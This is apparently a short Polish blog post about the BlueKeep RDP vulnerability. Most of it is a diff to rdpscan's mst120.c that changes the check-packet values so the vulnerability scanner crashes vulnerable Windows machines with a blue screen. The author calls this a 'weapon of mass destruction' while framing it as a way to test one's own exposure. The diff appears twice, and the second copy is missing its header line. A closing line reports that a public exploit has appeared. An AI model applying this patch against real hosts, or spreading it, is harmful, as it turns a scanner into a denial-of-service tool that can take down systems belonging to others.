To co chcę dodać od siębie w tym temacie, to prosta łatka która z narzędzia rdpscan badającego czy nasz system jest podatny, zrobi narzędzie masowej zagłady wykładające podatne systemy z słynnym BlueScreen.
Czy rozsiadam się właśnie z miską popcornu by patrzeć jak świat płonie? Nie koniecznie, nie ma lepszego sposobu na zweryfikowanie czy jesteśmy podatni, jak uderzenie bezpośrednio w lukę.
diff --git a/src/mst120.c b/src/mst120.c
index 26b1309..b9049c9 100644
--- a/src/mst120.c
+++ b/src/mst120.c
@@ -91,7 +91,7 @@ mst120_check(int is_send)
if (is_send)
{
++g_check_count;
- mst120_send_check_packet(0x20, 8);
- mst120_send_check_packet(0x10, 4);
+ mst120_send_check_packet(0x22, 8);
+ mst120_send_check_packet(0x12, 4);
}
}
index 26b1309..b9049c9 100644
--- a/src/mst120.c
+++ b/src/mst120.c
@@ -91,7 +91,7 @@ mst120_check(int is_send)
if (is_send)
{
++g_check_count;
- mst120_send_check_packet(0x20, 8);
- mst120_send_check_packet(0x10, 4);
+ mst120_send_check_packet(0x22, 8);
+ mst120_send_check_packet(0x12, 4);
}
}
Update (2019.10.05): Pojawił się exploit wykorzystujący podatność